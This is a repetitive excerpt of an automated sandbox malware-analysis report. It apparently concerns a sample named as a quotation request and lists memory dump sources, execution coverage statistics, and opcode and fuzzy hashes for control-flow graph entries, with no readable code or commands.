                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:10.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:10.5%
                                                                                                                                              Total number of Nodes:38
                                                                                                                                              Total number of Limit Nodes:5

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4070627740.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_9db0000_vbc.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd


                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 09DB9A6E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4070627740.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_9db0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 202c2340a9aab4e278e1cb0b5661677c948f4b4b7d449454fe82af8345a07429
                                                                                                                                              • Instruction ID: 0dc2e365af33d988294c0f0930c8911eba46344e9fbf9f69cd5e51256e807c26
                                                                                                                                              • Opcode Fuzzy Hash: 202c2340a9aab4e278e1cb0b5661677c948f4b4b7d449454fe82af8345a07429
                                                                                                                                              • Instruction Fuzzy Hash: B612AA348322929FE2802B30F6AE12E7B65FB5F723B46AD05F01FC4455DB7A15588B22

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f8909d178dd2ea1581ad7e670ead0a2f7d5516e46872afcd03157eca47d0e4de
                                                                                                                                              • Instruction ID: 25d8b54bc057ae07c3d4cb75132fb5851a988c786870ba7a7d5098574130814f
                                                                                                                                              • Opcode Fuzzy Hash: f8909d178dd2ea1581ad7e670ead0a2f7d5516e46872afcd03157eca47d0e4de
                                                                                                                                              • Instruction Fuzzy Hash: F91298748322939FE6803B30F6AE12E7B65FB5F723B46AD05F01FC44559B7A14588B22

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2fcaf15d297574dfb01fd5cc31b2e8924c4a59fe7724c7d05769d14d360482a9
                                                                                                                                              • Instruction ID: f6daab55af12f75c1c7244fa3ed7aa9f36f9ba659696490d77edaded126a9213
                                                                                                                                              • Opcode Fuzzy Hash: 2fcaf15d297574dfb01fd5cc31b2e8924c4a59fe7724c7d05769d14d360482a9
                                                                                                                                              • Instruction Fuzzy Hash: 0852FD74A02219CFDF64DF68E989B9DBBB6FB88301F104199D40AA7755DB34AD81CF80

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cea29dc77068e7ef18a37affa4aaed495097738c32ef1c51327a51e963e0ac0f
                                                                                                                                              • Instruction ID: c09e0df7f57c45eced0ec601f029064d1fba60b7873022b131312ef17d98ff2d
                                                                                                                                              • Opcode Fuzzy Hash: cea29dc77068e7ef18a37affa4aaed495097738c32ef1c51327a51e963e0ac0f
                                                                                                                                              • Instruction Fuzzy Hash: 4552FD74A02219CFDF64DF68E989B9DBBB6FB88301F104199D40AA7755DB34AD81CF80

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5ab6cc1f492bc07dc2dbf0e71639af521e9d7ee498f0c84c79785596a0ac5914
                                                                                                                                              • Instruction ID: 7450b29b96a9cfc05732c947337141f6096e3a1b918eb27ec91fab4a6a8ee1bb
                                                                                                                                              • Opcode Fuzzy Hash: 5ab6cc1f492bc07dc2dbf0e71639af521e9d7ee498f0c84c79785596a0ac5914
                                                                                                                                              • Instruction Fuzzy Hash: E6125A30A002099FCB15DF69D884AAEBBF2FF89314F1485A9E94ADB361D771ED41CB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 75180d4f31265f7cb5dc2205ee6e2069d938cd6e1a390416d183e909be86cb75
                                                                                                                                              • Instruction ID: fa71c08f79ed778c68555da4190c6e50a078eb4707001af94b88a259e3900668
                                                                                                                                              • Opcode Fuzzy Hash: 75180d4f31265f7cb5dc2205ee6e2069d938cd6e1a390416d183e909be86cb75
                                                                                                                                              • Instruction Fuzzy Hash: 50B1DB707082019FDB159F74D859B7E7BA6BF89300F14856AEA06CB392CB79CC42D7A0

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2d085f0b5ba2cb00c8f75c5c2ed565875f0c0dfc68bc7c6f72ad473f9ac065df
                                                                                                                                              • Instruction ID: f5d5d9e7869d224ae3cc129b5b7b692818a5d0e5150ecee70680f0b7592f0a6a
                                                                                                                                              • Opcode Fuzzy Hash: 2d085f0b5ba2cb00c8f75c5c2ed565875f0c0dfc68bc7c6f72ad473f9ac065df
                                                                                                                                              • Instruction Fuzzy Hash: DB913732A046459FCB11CF28C884BAABBB6FF85320B15C6A7D958D7351C731EC52CBA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a5b93a371b274a0dce3045a8871450c1f0e92df39d5e7204fffcb2f1d1f30a67
                                                                                                                                              • Instruction ID: c305092a3d3cbedd488f89bb24ac7d1ee4df29f6a9c67acc8eabe546b1ebdd34
                                                                                                                                              • Opcode Fuzzy Hash: a5b93a371b274a0dce3045a8871450c1f0e92df39d5e7204fffcb2f1d1f30a67
                                                                                                                                              • Instruction Fuzzy Hash: 3D81E230B04505CFCB18DF69C88AA69BBF6FF89700B14816AD606EB765DB71EC41CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2cdbbe37c624975f1e03e90ad5ea5ad228797effab1f030804a6bfe8061c04b6
                                                                                                                                              • Instruction ID: 15259801fd9ccad5f8749a71b6f0b53ce73decd0de01fe2810611d29ad816ffd
                                                                                                                                              • Opcode Fuzzy Hash: 2cdbbe37c624975f1e03e90ad5ea5ad228797effab1f030804a6bfe8061c04b6
                                                                                                                                              • Instruction Fuzzy Hash: 6E715C357046059FCB18DF68C888A7EBBE6BF49304B1500A9EA06DB371DBB5EC41CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 66203e54ae1f1f8baadd710acf76c7db2237ad69ddec79b1f1cd41d8c462294d
                                                                                                                                              • Instruction ID: aa13cc19e034fb7b6ed2d6d4b9567688c6c7440720f234186449283fc0c39a84
                                                                                                                                              • Opcode Fuzzy Hash: 66203e54ae1f1f8baadd710acf76c7db2237ad69ddec79b1f1cd41d8c462294d
                                                                                                                                              • Instruction Fuzzy Hash: D5610E30D01319DFDB14DFA5D854AAEBBB2FF88300F608529D80AAB395DB355A45CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 08edcfc109935287c85f5535adf3f439f013e35f2e9f0627f2cd22ff7a8052d6
                                                                                                                                              • Instruction ID: 91383cdace99478225a8d15d80b15da1616959e771476e87af95925c3d63528c
                                                                                                                                              • Opcode Fuzzy Hash: 08edcfc109935287c85f5535adf3f439f013e35f2e9f0627f2cd22ff7a8052d6
                                                                                                                                              • Instruction Fuzzy Hash: 06518274E01208DFDB48DFA9D59499DBBF2BF89300F248569E809AB364DB319805CF10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 20d742f13b2d2cb41984e40d70b117a03e34b9bea6593d5f70f18f7b6d5fe1b9
                                                                                                                                              • Instruction ID: a8795347f39ecc7b85a9247e55627ac963b154e7ca192af9371df2a018174200
                                                                                                                                              • Opcode Fuzzy Hash: 20d742f13b2d2cb41984e40d70b117a03e34b9bea6593d5f70f18f7b6d5fe1b9
                                                                                                                                              • Instruction Fuzzy Hash: CF41E6717042019FC709AB74E828A6EBBB7AFC9700B14446AE61ACB791DF359D05C7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e970c82181cc2087c3394ea1df0a842aae10bd07a452d4525d9a65877795c4bf
                                                                                                                                              • Instruction ID: 83ef375d5bcea7f6dbd4ff4df9283f7269e97cea5d092f52e152eebb35be9f4d
                                                                                                                                              • Opcode Fuzzy Hash: e970c82181cc2087c3394ea1df0a842aae10bd07a452d4525d9a65877795c4bf
                                                                                                                                              • Instruction Fuzzy Hash: 5D519374E01208DFDB18DFA9D59499EBBF6FF89300F209069E815AB365DB31A942CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 82bca5534d7fc4ab5a1041dfab8d82186a57c4ca83f8442d68e334f8a17eff74
                                                                                                                                              • Instruction ID: 6c5f031a0320f304ba68f3ae5c6eaadd5bc42ce228e6ff6fb94766ef586199b7
                                                                                                                                              • Opcode Fuzzy Hash: 82bca5534d7fc4ab5a1041dfab8d82186a57c4ca83f8442d68e334f8a17eff74
                                                                                                                                              • Instruction Fuzzy Hash: EA418231A04249DFCF11CFA4D848AEDBFB2BF49350F048156EA19AB791D375E964CB60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a3e43fd930ebc50e1919d2fbdc02a88e48ed4aaff0576df72e4213d7cdf43d2
                                                                                                                                              • Instruction ID: f181f9d389460404bf2c0405d91db7d916acb90026275dc625b01adb482c1d6b
                                                                                                                                              • Opcode Fuzzy Hash: 8a3e43fd930ebc50e1919d2fbdc02a88e48ed4aaff0576df72e4213d7cdf43d2
                                                                                                                                              • Instruction Fuzzy Hash: 6B31C4317093648BEF1D567558A427AAAABBFC4610F18483AEA03D7380DFB9C84597A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5778bac3fd65c42d0fe313d057f764c1fcf841887b1476588956fc6c75449b26
                                                                                                                                              • Instruction ID: ae30766f22f69d9063458478b10d7fb1adffa0fb26f5ccf43144fba6e1ee9dd6
                                                                                                                                              • Opcode Fuzzy Hash: 5778bac3fd65c42d0fe313d057f764c1fcf841887b1476588956fc6c75449b26
                                                                                                                                              • Instruction Fuzzy Hash: 11415E317042458FDB01DF68C884B7A7BA6FF89314F5484A6EA08CB296D775DC41CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e88f9fc26e74bc32e18d3d6ccded9853a8c709c0a7241f4183783f7d9c429da
                                                                                                                                              • Instruction ID: feec645589674ae7eaad0503c2f73c189b3c461202a81de72085645521c19952
                                                                                                                                              • Opcode Fuzzy Hash: 4e88f9fc26e74bc32e18d3d6ccded9853a8c709c0a7241f4183783f7d9c429da
                                                                                                                                              • Instruction Fuzzy Hash: 0431C2203083519FC72D8B38E854A3EBB6BFF85600B14059AE142CB693DB68CC8087A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af842b1584a0ba337c976235e0d2ce0dd2bd49488909d179b3fe2836c6476a32
                                                                                                                                              • Instruction ID: 8441ff48e4ee93dd7beef09a93e7e8d5d3e780326262692d3ed8b9a126255100
                                                                                                                                              • Opcode Fuzzy Hash: af842b1584a0ba337c976235e0d2ce0dd2bd49488909d179b3fe2836c6476a32
                                                                                                                                              • Instruction Fuzzy Hash: 500168B27052446FCB429EA49C146EF3FA7EBC9640F18405AFA01C7380CA368D1297D0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 418f820a4127ac58f28014031a3484c388cf93277d95248e9a98b609de61436d
                                                                                                                                              • Instruction ID: 6eca2f92da1d08eb19ee5834736f3ffad8394a486289776f17a1e958daec3a4e
                                                                                                                                              • Opcode Fuzzy Hash: 418f820a4127ac58f28014031a3484c388cf93277d95248e9a98b609de61436d
                                                                                                                                              • Instruction Fuzzy Hash: 0FF044363002156FDB085AA5A854B7BBA9BEFC8260B148429BA4AC7351DE76CC0197A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9b20f273f3e140ee8f57d5835159c4f41c7e353215052ecf6c5d3da67a930977
                                                                                                                                              • Instruction ID: ca92c13d214fdb3738d42a505031f08bf63285476e447d765b6629a839620000
                                                                                                                                              • Opcode Fuzzy Hash: 9b20f273f3e140ee8f57d5835159c4f41c7e353215052ecf6c5d3da67a930977
                                                                                                                                              • Instruction Fuzzy Hash: 82F096313146104B87155A6EA458A2AB6DEFFC8A593594079EA0EC7361EEA1DC438790
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9af8abeed3c0e79b3293efff592a9a32adabc0fa1f16e3e58ed146bf027a4fd0
                                                                                                                                              • Instruction ID: 40e3d150519b09751d4d78f65f1f8118cc5fb4b51c11c0060979ea27bc663e31
                                                                                                                                              • Opcode Fuzzy Hash: 9af8abeed3c0e79b3293efff592a9a32adabc0fa1f16e3e58ed146bf027a4fd0
                                                                                                                                              • Instruction Fuzzy Hash: 751157B4D0524AEFCF01CFA8D454AEEBBB5FB89301F40446AD910A3751D7345A16DF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 60fb4d23645012e128bf06283fc0238ae45b34986cae319f51e2ff5d6d1f6946
                                                                                                                                              • Instruction ID: 0349dba34fc1e57a59068a0d02df5274f1b7fee48fad6f1e8b5c1b65614c2cf5
                                                                                                                                              • Opcode Fuzzy Hash: 60fb4d23645012e128bf06283fc0238ae45b34986cae319f51e2ff5d6d1f6946
                                                                                                                                              • Instruction Fuzzy Hash: 22E08C300093C60ECB03A374A8A90687F2AEEC2900B188996D0840994BEF64692983A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6c632a9b3e63d7007aa45ce402e3b8ae4b6910b7639a1a07cbf0404f4be2e5cb
                                                                                                                                              • Instruction ID: d33a9113c1255a00e3e6fa639b5ba39e94af6f4d90c08b01fb93d93a24beaddf
                                                                                                                                              • Opcode Fuzzy Hash: 6c632a9b3e63d7007aa45ce402e3b8ae4b6910b7639a1a07cbf0404f4be2e5cb
                                                                                                                                              • Instruction Fuzzy Hash: 18E0C231E2012B86CB10DBA0EC444EEFB34EED5312B404227D41036000EB301699C7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 13fc1bae1fdb04e33a3e0051a1550c33ded3f5863dea3367cc4738107d139efc
                                                                                                                                              • Instruction ID: 70d4c9f05f3cf7a6e4aeadf1be5545a25f35a0c1b28ff6e1d2e8b5ed03d790fc
                                                                                                                                              • Opcode Fuzzy Hash: 13fc1bae1fdb04e33a3e0051a1550c33ded3f5863dea3367cc4738107d139efc
                                                                                                                                              • Instruction Fuzzy Hash: 89C0123360C2283EA238504E7C41EF3BB8ED2C12B4A210237FA1C93A01AC829C8002F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bdd00566e0069553afe398027035b6c58fc929af020af8857e953559e1b9bcaa
                                                                                                                                              • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                                                                                                              • Opcode Fuzzy Hash: bdd00566e0069553afe398027035b6c58fc929af020af8857e953559e1b9bcaa
                                                                                                                                              • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 651d6f7a9ca4e917595af60235309c6da09a02a313ef356bdb7411642db66ebc
                                                                                                                                              • Instruction ID: 57591397658ab47f1528264d3c9c6d8ac9664d06e3ad8334b59a1856244b1c4e
                                                                                                                                              • Opcode Fuzzy Hash: 651d6f7a9ca4e917595af60235309c6da09a02a313ef356bdb7411642db66ebc
                                                                                                                                              • Instruction Fuzzy Hash: DAD04235E05109CBCB60DFA8E4894DCFB71EB99222B10942BD929A3651DB3558558F11
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a9b3188869eced4e4bf4676e7c2dd0c3d89de01466f38577d50bcfa4892f4f40
                                                                                                                                              • Instruction ID: ccb319cc2cd82a2e9872deade4fa32471503c4b6994813e27985be68bbfa5dfd
                                                                                                                                              • Opcode Fuzzy Hash: a9b3188869eced4e4bf4676e7c2dd0c3d89de01466f38577d50bcfa4892f4f40
                                                                                                                                              • Instruction Fuzzy Hash: 20D0677AB00008AFCB049F99E8449DDF776FB98221B048116E915A3260C6319925DB60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
